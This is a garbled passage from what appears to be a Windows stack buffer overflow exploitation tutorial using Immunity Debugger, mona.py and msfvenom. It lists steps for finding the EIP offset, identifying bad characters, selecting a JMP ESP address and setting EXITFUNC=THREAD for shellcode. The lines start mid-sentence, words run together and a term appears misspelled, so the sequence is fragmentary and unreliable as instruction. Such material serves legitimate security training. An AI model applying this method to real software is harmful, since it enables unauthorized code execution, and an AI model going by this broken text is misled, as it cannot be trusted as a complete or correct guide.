C:\mona\pattern.txtwith the generated pattern will have been created.
buffervariable and execute it.
buffervariable in order to check that the offset is correct.
Ctrl+F2, hit PLAY
F9and re-launch the exploit, getting an "Access violation" with the EIP register full of Bs (0x42).
!mona bytearray -b "\x00x<BADCHAR>", adding the bad chars found and run the exploit again. Moreover, remove the bad chars from the
JMP ESPinstruction but whose address does not contain the previously obtained bad chars.
window/Log datawindow, you will see several results, as it is possible to use the address of momeria, whose file is from the application itself and which has everything set to "False".
EXITFUNC=THREADso that the exploit can be launched multiple times.
msfvenom --list encoders.